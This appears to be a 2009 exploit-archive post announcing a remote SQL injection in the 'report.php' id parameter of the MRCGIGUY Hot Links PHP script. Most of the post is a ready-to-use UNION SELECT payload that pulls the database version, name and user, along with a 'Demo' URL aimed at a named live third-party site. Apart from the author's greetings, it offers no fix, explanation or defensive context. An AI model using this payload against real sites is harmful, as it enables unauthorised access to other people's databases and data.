[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MRCGIGUY Hot Links (report.php id) Remote SQL Injection Vulnerability
# Published : 2009-06-09
# Author : ThE g0bL!N
# Previous Title : MRCGIGUY The Ticket System 2.0 PHP Multiple Remote Vulnerabilities
# Next Title : TekBase All-in-One 3.1 Multiple SQL Injection Vulnerabilities


MRCGIGUY Hot Links SQL (PHP) (report.php id) Remote SQL Injection
Founder: ThE g0bL!N
------
Home: http:/www.4ckx.com/dz/
----
Vendor:http://www.mrcgiguy.com
Special Thx:  All Muslims All Members Of Team Algerien Of FootBall
Note: Algerie 3-1 Egypt
Exploit:
------
SQL INJECTION:
-------------
http://wwww.victim.com/report.php?id=[SQL CODE]
[ SQL CODE]=17281+union+select+concat(version(),0x3a,database(),0x3a,user()),2,3--
Demo:
----
http://www.myhotlinks.net/hlphpsql/report.php?id=17281+union+select+concat(version(),0x3a,database(),0x3a,user()),2,3--

# www.Syue.com [2009-06-09]